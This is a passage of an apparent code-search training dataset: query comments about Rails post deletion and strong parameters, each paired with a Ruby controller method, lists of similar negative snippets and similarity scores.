"def update\n respond_to do |format|\n if @post.update(post_params)\n format.html { redirect_to @post, notice: 'Post was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: 'edit' }\n format.json { render json: @post.errors, status: :unprocessable_entity }\n end\n end\n end"
] |
[
"0.7186324",
"0.7040601",
"0.677308",
"0.6765753",
"0.6668628",
"0.66481066",
"0.6577776",
"0.65553194",
"0.65502805",
"0.65495133",
"0.65345335",
"0.6529854",
"0.64982027",
"0.64969105",
"0.6467084",
"0.64304507",
"0.6428232",
"0.6426466",
"0.6425566",
"0.6419249",
"0.64181453",
"0.6411935",
"0.63997275",
"0.63997275",
"0.63894093",
"0.6381795",
"0.6369432",
"0.6369432",
"0.6369432",
"0.6369432",
"0.6369432",
"0.6369432",
"0.6369432",
"0.6369432",
"0.6369432",
"0.6369432",
"0.6369432",
"0.6369432",
"0.6369432",
"0.6369432",
"0.6369432",
"0.6369432",
"0.6369337",
"0.6359892",
"0.63594955",
"0.63580275",
"0.635544",
"0.635544",
"0.635544",
"0.635544",
"0.6347316",
"0.6338459",
"0.6337452",
"0.6332606",
"0.63279086",
"0.63192517",
"0.6307825",
"0.6294169",
"0.6289934",
"0.627602",
"0.62720805",
"0.6270453",
"0.62700033",
"0.6262321",
"0.62506497",
"0.6240972",
"0.62274104",
"0.6215559",
"0.62133217",
"0.62053937",
"0.62027586",
"0.62027586",
"0.62027586",
"0.62027586",
"0.62027586",
"0.62027586",
"0.62027586",
"0.62027586",
"0.62027586",
"0.62027586",
"0.6201748",
"0.6195721",
"0.6180375",
"0.6178203",
"0.61738944",
"0.6167035",
"0.6157961",
"0.6153888",
"0.61472106",
"0.61472106",
"0.6140896",
"0.6120805",
"0.6114453",
"0.61128646",
"0.6107943",
"0.610538",
"0.6103636",
"0.6097605",
"0.609677",
"0.60931516",
"0.6092766"
] |
0.0
|
-1
|
DELETE /posts/1 DELETE /posts/1.json
|
def destroy
@calendar = Calendar.find(params[:calendar_id])
@event = Event.find(params[:event_id])
@post = @event.posts.find(params[:id])
@post.destroy
respond_to do |format|
format.html { redirect_to [@calendar,@event], notice: 'Post was successfully destroyed.' }
format.json { head :no_content }
end
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def delete\n render json: Post.delete(params[\"id\"])\n end",
"def destroy\n @post.destroy\n respond_to do |format|\n format.json { head :no_content }\n end\n end",
"def destroy\n post = Post.find(params[:id])\n if post.destroy\n render json: {status: \"success\", data: {id: params[:id]}}, status: :ok\n end\n end",
"def destroy\n @post.destroy\n render json: {}, status: :ok\n end",
"def destroy\n if @post.destroy\n render json: {\n post: @post\n }, status: :ok\n else\n render status: :bad_request\n end\n end",
"def destroy\n @api_v2_post = Post.find(params[:id])\n @api_v2_post.destroy\n\n respond_to do |format|\n format.html { redirect_to api_v2_posts_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @api_v1_post.destroy\n respond_to do |format|\n format.html { redirect_to api_v1_posts_url, notice: 'Post was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @post.destroy\n\n respond_to do |format|\n format.html { redirect_to posts_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n authenticated\n @post = Post.find(params[:id])\n @post.destroy\n\n respond_to do |format|\n format.html { redirect_to posts_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n # @post = Post.find(params[:id])\n # @post.destroy\n\n respond_to do |format|\n format.html { redirect_to posts_url }\n format.json { head :ok }\n end\n end",
"def destroy\n @post.destroy\n\n json_response(@post)\n end",
"def destroy\n @post = Post.find(params[:id])\n @post.destroy\n\n respond_to do |format|\n format.html { redirect_to posts_url }\n format.json { head :ok }\n end\n end",
"def destroy\n @post = Post.find(params[:id])\n @post.destroy\n\n respond_to do |format|\n format.html { redirect_to posts_url }\n format.json { head :ok }\n end\n end",
"def destroy\n @post = Post.find(params[:id])\n @post.destroy\n\n respond_to do |format|\n format.html { redirect_to posts_url }\n format.json { head :ok }\n end\n end",
"def destroy\n @post = Post.find(params[:id])\n @post.destroy\n\n respond_to do |format|\n format.html { redirect_to posts_url }\n format.json { head :ok }\n end\n end",
"def destroy\n @post.destroy\n respond_to do |format|\n format.html { redirect_to posts_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @post.destroy\n respond_to do |format|\n format.html { redirect_to posts_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @post.destroy\n respond_to do |format|\n format.html { redirect_to posts_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @post.destroy\n respond_to do |format|\n format.html { redirect_to posts_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @post.destroy\n respond_to do |format|\n format.html { redirect_to posts_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @post.destroy\n respond_to do |format|\n format.html { redirect_to posts_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @post.destroy\n respond_to do |format|\n format.html { redirect_to posts_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @post.destroy\n respond_to do |format|\n format.html { redirect_to posts_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @post.destroy\n respond_to do |format|\n format.html { redirect_to posts_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @post.destroy\n respond_to do |format|\n format.html { redirect_to posts_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @post.destroy\n respond_to do |format|\n format.html { redirect_to posts_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @post.destroy\n respond_to do |format|\n format.html { redirect_to posts_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @post.destroy\n respond_to do |format|\n format.html { redirect_to posts_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @post.destroy\n respond_to do |format|\n format.html { redirect_to posts_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @post = Post.find(params[:id])\n @post.destroy\n\n respond_to do |format|\n format.html { redirect_to posts_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @post = Post.find(params[:id])\n @post.destroy\n\n respond_to do |format|\n format.html { redirect_to posts_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @post = Post.find(params[:id])\n @post.destroy\n\n respond_to do |format|\n format.html { redirect_to posts_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @post = Post.find(params[:id])\n @post.destroy\n\n respond_to do |format|\n format.html { redirect_to posts_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @post = Post.find(params[:id])\n @post.destroy\n\n respond_to do |format|\n format.html { redirect_to posts_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @post = Post.find(params[:id])\n @post.destroy\n\n respond_to do |format|\n format.html { redirect_to posts_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @post = Post.find(params[:id])\n @post.destroy\n\n respond_to do |format|\n format.html { redirect_to posts_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @post = Post.find(params[:id])\n @post.destroy\n\n respond_to do |format|\n format.html { redirect_to posts_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @post = Post.find(params[:id])\n @post.destroy\n\n respond_to do |format|\n format.html { redirect_to posts_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @post = Post.find(params[:id])\n @post.destroy\n\n respond_to do |format|\n format.html { redirect_to posts_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @post = Post.find(params[:id])\n @post.destroy\n\n respond_to do |format|\n format.html { redirect_to posts_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @post = Post.find(params[:id])\n @post.destroy\n\n respond_to do |format|\n format.html { redirect_to posts_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @post = Post.find(params[:id])\n @post.destroy\n\n respond_to do |format|\n format.html { redirect_to posts_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @post = Post.find(params[:id])\n @post.destroy\n\n respond_to do |format|\n format.html { redirect_to posts_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @post = Post.find(params[:id])\n @post.destroy\n\n respond_to do |format|\n format.html { redirect_to posts_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @post = Post.find(params[:id])\n @post.destroy\n\n respond_to do |format|\n format.html { redirect_to posts_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @post = Post.find(params[:id])\n @post.destroy\n\n respond_to do |format|\n format.html { redirect_to posts_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @post = Post.find(params[:id])\n @post.destroy\n\n respond_to do |format|\n format.html { redirect_to posts_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @post = Post.find(params[:id])\n @post.destroy\n\n respond_to do |format|\n format.html { redirect_to posts_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @post = Post.find(params[:id])\n @post.destroy\n\n respond_to do |format|\n format.html { redirect_to posts_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @post = Post.find(params[:id])\n @post.destroy\n\n respond_to do |format|\n format.html { redirect_to posts_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @post = Post.find(params[:id])\n @post.destroy\n\n respond_to do |format|\n format.html { redirect_to posts_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @post = Post.find(params[:id])\n @post.destroy\n\n respond_to do |format|\n format.html { redirect_to posts_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @post = Post.find(params[:id])\n @post.destroy\n\n respond_to do |format|\n format.html { redirect_to posts_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @post = Post.find(params[:id])\n @post.destroy\n\n respond_to do |format|\n format.html { redirect_to posts_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @post = Post.find(params[:id])\n @post.destroy\n\n respond_to do |format|\n format.html { redirect_to posts_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @post = Post.find(params[:id])\n @post.destroy\n\n respond_to do |format|\n format.html { redirect_to posts_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @post = Post.find(params[:id])\n @post.destroy\n\n respond_to do |format|\n format.html { redirect_to posts_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @post = Post.find(params[:id])\n @post.destroy\n\n respond_to do |format|\n format.html { redirect_to posts_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @post = Post.find(params[:id])\n @post.destroy\n\n respond_to do |format|\n format.html { redirect_to posts_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @post = Post.find(params[:id])\n @post.destroy\n\n respond_to do |format|\n format.html { redirect_to posts_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n respond_with Post.destroy(params[:id])\n end",
"def destroy\n r = PostRepository.new\n @post = r.GetPost(\"PostID\", params[:id].to_i)\n r.delete @post\n\n respond_to do |format|\n format.html { redirect_to(posts_url) }\n format.xml { head :ok }\n end\n end",
"def destroy\n @post = Post.find(params[:id])\n @post.destroy\n\n respond_to do |format|\n format.json { head :no_content }\n format.xml { head :no_content }\n end\n end",
"def destroy\n @api_post.destroy\n\n head :no_content\n end",
"def destroy\n @post.destroy\n render json: {\n data: {\n post: { key: @post.id },\n status: @post.status,\n }\n }\n end",
"def destroy\n\t\tpost = Post.find(params[:id])\n\t\t# byebug\n \tpost.destroy\n\t posts = Post.all\n \trender json: posts\n end",
"def destroy\r\n @post = Post.find(params[:id])\r\n @post.destroy\r\n\r\n respond_to do |format|\r\n format.html { redirect_to posts_url }\r\n format.json { head :no_content }\r\n end\r\n end",
"def destroy\n @post = Post.find(params[:id])\n @post.destroy\n\n respond_to do |format|\n format.html { redirect_to posts_path, notice: \"Post removed.\" }\n format.json { render 'destroy' }\n end\n end",
"def delete\n @post = Post.find(params[:id])\n end",
"def destroy\n @post.destroy\n respond_to do |format|\n format.html { redirect_to posts_path(client_id:current_user.client.id, per_page:5), notice: 'Post was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @post.destroy\n respond_to do |format|\n format.html { redirect_to dashboard_index_path }\n format.json { head :no_content }\n end\n end",
"def destroy\n respond_with Post.destroy(params[:id])\n end",
"def destroy\r\n @post = Post.find(params[:id])\r\n @post.destroy\r\n\r\n respond_to do |format|\r\n format.html { redirect_to root_url }\r\n format.json { head :no_content }\r\n end\r\n end",
"def destroy\n @post.destroy\n\n head :no_content\n end",
"def destroy\n @post.destroy\n respond_to do |format|\n format.html { redirect_to '/admin/posts' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @post.destroy\n\n render json: Post.all.as_json\n end",
"def destroy\n @post.destroy\n head :no_content\n end",
"def destroy\n @post.destroy\n head :no_content\n end",
"def destroy\n @post.destroy\n respond_to do |format|\n format.html { redirect_to blog_posts_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @post = Post.find(params[:id])\n @post.destroy\n @title = \"Kill Post\"\n\n respond_to do |format|\n format.html { redirect_to posts_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @post.destroy\n\n respond_to do |format|\n format.html { redirect_to all_user_posts_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @post.destroy\n head :no_content\n end",
"def destroy\n @post.destroy\n respond_to do |format|\n format.html {redirect_to posts_url, notice: 'Post was successfully destroyed.'}\n format.json {head 200}\n end\n end",
"def destroy\n @post.destroy\n respond_to do |format|\n format.html { redirect_to posts_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @post.destroy\n respond_to do |format|\n format.html { redirect_to posts_path, notice: 'Post was successfully deleted.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n respond_with post.destroy(params[:id])\n end",
"def destroy\n @post.destroy\n \n respond_to do |format|\n format.html { redirect_to post_url, notice: 'Post was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def delete\n client.delete(\"/#{id}\")\n end",
"def destroy\n Post.find(params[:id]).delete\n\n redirect_to '/'\n end",
"def destroy\n # @post = Post.find(params[:id])\n #@post.destroy\n\n #respond_to do |format|\n # format.html { redirect_to posts_url }\n #format.json { head :no_content }\n #end\n end",
"def delete(url)\n raise Error, \"Missing URL\" unless url\n get('posts/delete?uri=' << u(url))\n nil\n end",
"def destroy\n @post.destroy\n\n respond_to do |format|\n format.html { redirect_to news_url }\n format.json { head :ok }\n end\n end",
"def destroy\n @post = Post.find_by_slug(params[:id])\n @post.destroy\n\n respond_to do |format|\n format.html { redirect_to posts_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @post = Post.find(params[:id])\n @post.destroy\n\n respond_to do |format|\n format.html { redirect_to posts_url, notice: \"Anúncio removido com sucesso.\" }\n format.json { head :no_content }\n end\n end",
"def destroy\n @post = Post.friendly.find(params[:id])\n @post.destroy\n respond_to do |format|\n format.html { redirect_to root_path, notice: 'Story deleted' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @post.destroy\n respond_to do |format|\n format.html { redirect_to posts_url, notice: \"Postitus edukalt kustutatud!\" }\n format.json { head :no_content }\n end\n end",
"def destroy\n @post.destroy\n respond_to do |format|\n format.html { redirect_to posts_url, notice: 'Postagem excluida com sucesso.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @post.destroy\n respond_to do |format|\n format.html { redirect_to posts_url, notice: 'Postagem excluída com sucesso!' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @mural_post.destroy\n respond_to do |format|\n format.html { redirect_to mural_posts_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @posto = Posto.find(params[:id])\n @posto.destroy\n\n respond_to do |format|\n format.html { redirect_to postos_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @api_post.destroy\n end"
] |
[
"0.8046884",
"0.76902676",
"0.7583626",
"0.75803024",
"0.7568048",
"0.75047046",
"0.75031126",
"0.74750155",
"0.74671036",
"0.74650854",
"0.746482",
"0.74589694",
"0.74589694",
"0.74589694",
"0.74589694",
"0.74579465",
"0.74579465",
"0.74579465",
"0.74579465",
"0.74579465",
"0.74579465",
"0.74579465",
"0.74579465",
"0.74579465",
"0.74579465",
"0.74579465",
"0.74579465",
"0.74579465",
"0.74579465",
"0.7428427",
"0.7428427",
"0.7428427",
"0.7428427",
"0.7428427",
"0.7428427",
"0.7428427",
"0.7428427",
"0.7428427",
"0.7428427",
"0.7428427",
"0.7428427",
"0.7428427",
"0.7428427",
"0.7428427",
"0.7428427",
"0.7428427",
"0.7428427",
"0.7428427",
"0.7428427",
"0.7428427",
"0.7428427",
"0.7428427",
"0.7428427",
"0.7428427",
"0.7428427",
"0.7428427",
"0.7428427",
"0.7428427",
"0.7428427",
"0.7428427",
"0.7423174",
"0.74059606",
"0.73990285",
"0.73928183",
"0.7389498",
"0.7371715",
"0.7371117",
"0.7349121",
"0.7344524",
"0.7342226",
"0.7338908",
"0.7313371",
"0.73123556",
"0.731156",
"0.73095584",
"0.7299751",
"0.7298017",
"0.7298017",
"0.7282874",
"0.7277125",
"0.7266815",
"0.7260945",
"0.72549784",
"0.7254856",
"0.7239102",
"0.7238946",
"0.7229726",
"0.7227931",
"0.7221013",
"0.721375",
"0.7211237",
"0.72097856",
"0.7190222",
"0.71850675",
"0.7171746",
"0.71533066",
"0.71457464",
"0.71434635",
"0.7142048",
"0.7139985",
"0.7137574"
] |
0.0
|
-1
|
Use callbacks to share common setup or constraints between actions.
|
def set_post
@post = Post.find(params[:id])
#@event = Event.find(params[:event_id])#
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def set_required_actions\n # TODO: check what fields change to asign required fields\n end",
"def action_hook; end",
"def run_actions; end",
"def define_action_hook; end",
"def actions; end",
"def define_action_helpers\n if super && action == :save\n @instance_helper_module.class_eval do\n define_method(:valid?) do |*args|\n self.class.state_machines.fire_event_attributes(self, :save, false) { super(*args) }\n end\n end\n end\n end",
"def add_actions; end",
"def callbacks; end",
"def callbacks; end",
"def setup *actions, &proc\n (@setup_procs ||= []) << [proc, actions.size > 0 ? actions : [:*]]\n end",
"def define_action_helpers; end",
"def post_setup\n end",
"def action_methods; end",
"def action_methods; end",
"def action_methods; end",
"def before_setup; end",
"def action_run\n end",
"def execute(setup)\n @action.call(setup)\n end",
"def define_action_helpers?; end",
"def set_actions\n actions :all\n end",
"def action_done(action)\n dispatch = { :migrate => :done_migrating, :map => :done_mapping, :reduce =>\n :done_reducing, :finalize => :done_finalizing } \n self.send dispatch[action[:action]], action\n end",
"def dependencies action, &block\n @actions.each do |other|\n if action[:requires].include? other[:provide]\n block.call other\n end\n end\n end",
"def setup!\n return unless @setup_procs\n http_actions = actions\n @setup_procs.each do |setup_proc|\n proc, actions = setup_proc\n @setup__actions = actions.map do |action|\n\n action.is_a?(Regexp) ?\n http_actions.select { |a| a.to_s =~ action } :\n action.is_a?(String) && action =~ /\\A\\./ ?\n http_actions.map { |a| a.to_s << action if format?(a).include?(action) }.compact :\n action\n\n end.flatten\n self.class_exec &proc\n @setup__actions = nil\n end\n @setup_procs = nil\n end",
"def before_actions(*logic)\n self.before_actions = logic\n end",
"def setup_handler\n end",
"def set_action(opts)\n opts = check_params(opts,[:actions])\n super(opts)\n end",
"def setup(action)\n @targets.clear\n unless action.item.target_filters.empty?\n @targets = SES::TargetManager.make_targets(action)\n else\n item = action.item\n if item.for_opponent?\n @targets = $game_troop.alive_members\n elsif item.for_dead_friend?\n @targets = $game_party.battle_members.select { |actor| actor.dead? }\n else\n $game_party.battle_members.select { |actor| actor.alive? }\n end\n end\n @item_max = @targets.size\n create_contents\n refresh\n show\n activate\n end",
"def action; end",
"def action; end",
"def action; end",
"def action; end",
"def action; end",
"def workflow\n end",
"def revisable_shared_setup(args, block)\n class << self\n attr_accessor :revisable_options\n end\n options = args.extract_options!\n self.revisable_options = Options.new(options, &block)\n \n self.send(:include, Common)\n self.send(:extend, Validations) unless self.revisable_options.no_validation_scoping?\n self.send(:include, WithoutScope::QuotedColumnConditions)\n end",
"def setup\n @action = SampleActionAndroid.new(os_name: 'android',\n app_name: APP_PATH)\n end",
"def before(action)\n invoke_callbacks *self.class.send(action).before\n end",
"def process_action(...)\n send_action(...)\n end",
"def before_dispatch(env); end",
"def after_actions(*logic)\n self.after_actions = logic\n end",
"def setup\n # override and do something appropriate\n end",
"def setup(client)\n return unless @setup\n actions = @setup['setup'].select { |action| action['do'] }.map { |action| Action.new(action['do']) }\n actions.each do |action|\n action.execute(client)\n end\n self\n end",
"def setup(_context)\n end",
"def setup(resources) ; end",
"def validate_actions\n errors.add(:base, :should_give_at_least_one_action) if !manage? && !forecasting? && !read? && !api?\n end",
"def setup\n @resource_config = {\n :callbacks => {\n :before_create => nil,\n :after_create => nil,\n :before_update => nil,\n :after_update => nil,\n :before_destroy => nil,\n :after_destroy => nil,\n },\n :child_assoc => nil,\n :model => nil,\n :parent => nil,\n :path => nil,\n :permission => {},\n :properties => {},\n :relation => {\n :create => nil,\n :delete => nil,\n },\n :roles => nil,\n }\n end",
"def determine_valid_action\n\n end",
"def process_shared\n handle_taxes\n handle_shippings\n create_adjustments_from_params\n handle_status\n handle_inventory_refunds\n handle_payment_transactions\n order.updater.update\n end",
"def startcompany(action)\n @done = true\n action.setup\n end",
"def init_actions\n am = action_manager()\n am.add_action(Action.new(\"&Disable selection\") { @selection_mode = :none; unbind_key(32); bind_key(32, :scroll_forward); } )\n am.add_action(Action.new(\"&Edit Toggle\") { @edit_toggle = !@edit_toggle; $status_message.value = \"Edit toggle is #{@edit_toggle}\" })\n end",
"def event_callbacks(event, metadata={})\n case event\n when :reset, :review\n if confirmed\n update_attributes(confirmed: false)\n end\n when :confirm\n confirm\n # trigger :order for all applicable items\n # NOTE: :order event is common to both physical and digital items\n items.each do |i|\n if i.event_permitted(:order)\n user_id = last_transition.user_id\n i.trigger!(:order, { order_id: id, user_id: user_id })\n end\n end\n when :complete_work\n request = metadata[:request]\n work_complete_notification(request)\n when :close\n close\n end\n if event != :close && !open\n reopen\n end\n end",
"def setup_action\n return unless PONY::ERRNO::check_sequence(current_act)\n new_sequence = @action_sequence[@sequence_index+1...@action_sequence.size]\n @sequence_index = 0\n new_sequence = DND::SkillSequence::ACTS[@acts[1]] + new_sequence\n execute_sequence\n end",
"def define_tasks\n define_weave_task\n connect_common_tasks\n end",
"def setup(&block)\n define_method(:setup, &block)\n end",
"def setup\n transition_to(:setup)\n end",
"def setup\n transition_to(:setup)\n end",
"def action\n end",
"def setup( *args )\n\t\t\tself.class.setupBlocks.each {|sblock|\n\t\t\t\tdebugMsg \"Calling setup block method #{sblock}\"\n\t\t\t\tself.send( sblock )\n\t\t\t}\n\t\t\tsuper( *args )\n\t\tend",
"def config(action, *args); end",
"def setup\n @setup_proc.call(self) if @setup_proc\n end",
"def before_action \n end",
"def setup_callbacks\n defined_callbacks.each do |meth|\n unless respond_to?(\"call_#{meth}_callbacks\".to_sym)\n self.class.module_eval <<-EOE\n def call_#{meth}_callbacks(*args)\n plugin_store.each {|a| a.call_#{meth}_callbacks(*args) } if respond_to?(:plugin_store) && plugin_store\n self.send :#{meth}, *args if respond_to?(:#{meth})\n end\n EOE\n end\n end\n end",
"def action\n end",
"def matt_custom_action_begin(label); end",
"def setup\n # override this if needed\n end",
"def setup\n\t\t\t\t\t\t# Do nothing\n\t\t\t\tend",
"def setup\n\t\t\t\t\t\t# Do nothing\n\t\t\t\tend",
"def action(options,&callback)\n new_action = Action===options ? options : Action.new(options,&callback)\n # replace any with (shared name/alias or both default) + same arity\n @actions.delete_if do |existing_action|\n ((existing_action.names & new_action.names).size > 0 ||\n existing_action.default? && new_action.default?) &&\n existing_action.required.size == new_action.required.size &&\n existing_action.optional.size <= new_action.optional.size\n end\n @actions = (@actions + [new_action]).sort\n new_action\n end",
"def set_target_and_action target, action\n self.target = target\n self.action = 'sugarcube_handle_action:'\n @sugarcube_action = action\n end",
"def after(action)\n invoke_callbacks *options_for(action).after\n end",
"def pre_task\n end",
"def setup(server)\n server.on('beforeMethod', method(:before_method), 10)\n end",
"def add_actions\n attribute = machine.attribute\n name = self.name\n \n owner_class.class_eval do\n define_method(name) {self.class.state_machines[attribute].events[name].fire(self)}\n define_method(\"#{name}!\") {self.class.state_machines[attribute].events[name].fire!(self)}\n define_method(\"can_#{name}?\") {self.class.state_machines[attribute].events[name].can_fire?(self)}\n end\n end",
"def init_actions\n @select_action = SelectAction.new\n @endpoint_mouse_action = EndpointMouseAction.new\n @move_action = MoveAction.new\n end",
"def setup_signals; end",
"def after_created\r\n return unless compile_time\r\n Array(action).each do |action|\r\n run_action(action)\r\n end\r\nend",
"def after_created\r\n return unless compile_time\r\n Array(action).each do |action|\r\n run_action(action)\r\n end\r\nend",
"def set_target_and_action target, action\n self.target = target\n self.action = 'sugarcube_handle_action:'\n @sugarcube_action = action.respond_to?('weak!') ? action.weak! : action\n end",
"def initialize(*args)\n super\n @action = :set\nend",
"def after_set_callback; end",
"def setup\n #implement in subclass;\n end",
"def lookup_action; end",
"def setup &block\n if block_given?\n @setup = block\n else\n @setup.call\n end\n end",
"def setup_action\n return TSBS.error(@acts[0], 1, @used_sequence) if @acts.size < 2\n actions = TSBS::AnimLoop[@acts[1]]\n if actions.nil?\n show_action_error(@acts[1])\n end\n @sequence_stack.push(@acts[1])\n @used_sequence = @acts[1]\n actions.each do |acts|\n @acts = acts\n execute_sequence\n break if @break_action\n end\n @sequence_stack.pop\n @used_sequence = @sequence_stack[-1]\n end",
"def release_actions; end",
"def around_hooks; end",
"def save_action; end",
"def setup(easy)\n super\n easy.customrequest = @verb\n end",
"def action_target()\n \n end",
"def setup\n callback(:setup) do\n notify(:setup)\n migration_check.last_deployed_commit\n end\n end",
"def setup\n return unless @setup\n\n actions = @setup['setup'].select { |action| action['do'] }.map { |action| Action.new(action['do']) }\n run_actions_and_retry(actions)\n self\n end",
"def before_setup\n # do nothing by default\n end",
"def my_actions(options)\n @setup = false\n get_template_part(\"custom_used\",\"action_users\",true)\n end",
"def default_action; end",
"def setup(&blk)\n @setup_block = blk\n end",
"def callback_phase\n super\n end",
"def advice\n end",
"def _handle_action_missing(*args); end",
"def duas1(action)\n action.call\n action.call\nend",
"def shared_action(name, &block)\n @controller.shared_actions[name] = block\n end",
"def before_action action, &block\n @audience[:before][action] ||= Set.new\n @audience[:before][action] << block\n end",
"def setup_initial_state\n\n state_a = State.new(\"a\", 0)\n state_b = State.new(\"b\", 0)\n state_c = State.new(\"c\", 10)\n\n move_to_b = Action.new(\"move_to_b\", 1, state_b)\n\n move_to_c = Action.new(\"move_to_c\", 1, state_c)\n\n state_a.actions = [move_to_b, move_to_c]\n\n return state_a\n \nend"
] |
[
"0.6163163",
"0.6045976",
"0.5946146",
"0.591683",
"0.5890051",
"0.58349305",
"0.5776858",
"0.5703237",
"0.5703237",
"0.5652805",
"0.5621621",
"0.54210985",
"0.5411113",
"0.5411113",
"0.5411113",
"0.5391541",
"0.53794575",
"0.5357573",
"0.53402257",
"0.53394014",
"0.53321576",
"0.53124547",
"0.529654",
"0.5296262",
"0.52952296",
"0.52600986",
"0.52442724",
"0.52385926",
"0.52385926",
"0.52385926",
"0.52385926",
"0.52385926",
"0.5232394",
"0.523231",
"0.5227454",
"0.52226824",
"0.52201617",
"0.5212327",
"0.52079266",
"0.52050185",
"0.51754695",
"0.51726824",
"0.51710224",
"0.5166172",
"0.5159343",
"0.51578903",
"0.51522785",
"0.5152022",
"0.51518047",
"0.51456624",
"0.51398855",
"0.5133759",
"0.5112076",
"0.5111866",
"0.5111866",
"0.5110294",
"0.5106169",
"0.509231",
"0.50873137",
"0.5081088",
"0.508059",
"0.50677156",
"0.50562143",
"0.5050554",
"0.50474834",
"0.50474834",
"0.5036181",
"0.5026331",
"0.5022976",
"0.5015441",
"0.50121695",
"0.5000944",
"0.5000019",
"0.4996878",
"0.4989888",
"0.4989888",
"0.49864885",
"0.49797225",
"0.49785787",
"0.4976161",
"0.49683493",
"0.4965126",
"0.4958034",
"0.49559742",
"0.4954353",
"0.49535993",
"0.4952725",
"0.49467874",
"0.49423352",
"0.49325448",
"0.49282882",
"0.49269363",
"0.49269104",
"0.49252945",
"0.4923091",
"0.49194667",
"0.49174926",
"0.49173003",
"0.49171105",
"0.4915879",
"0.49155936"
] |
0.0
|
-1
|
Never trust parameters from the scary internet, only allow the white list through.
|
def post_params
params.require(:post).permit(:title, :content,:created_at, :image)
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def strong_params\n params.require(:user).permit(param_whitelist)\n end",
"def strong_params\n params.require(:listing_member).permit(param_whitelist)\n end",
"def allow_params_authentication!; end",
"def allowed_params\n ALLOWED_PARAMS\n end",
"def default_param_whitelist\n [\"mode\"]\n end",
"def param_whitelist\n [:role, :title]\n end",
"def expected_permitted_parameter_names; end",
"def safe_params\n params.except(:host, :port, :protocol).permit!\n end",
"def strong_params\n params.require(:team_member).permit(param_whitelist)\n end",
"def permitir_parametros\n \t\tparams.permit!\n \tend",
"def strong_params\n params.require(:community).permit(param_whitelist)\n end",
"def permitted_strong_parameters\n :all #or an array of parameters, example: [:name, :email]\n end",
"def strong_params\n params.require(:education).permit(param_whitelist)\n end",
"def restricted_params\n #params.require(self.controller_name.classify.underscore.to_sym).permit([])\n raise(\"No strong params set, override restricted_params method in your controller. E.g. params.require(:model).permit(:attribute1, :attribute2)\")\n end",
"def allowed_params\n params.require(:user).permit(:username, :email, :password, :password_confirmation)\n end",
"def param_whitelist\n [:rating, :review]\n end",
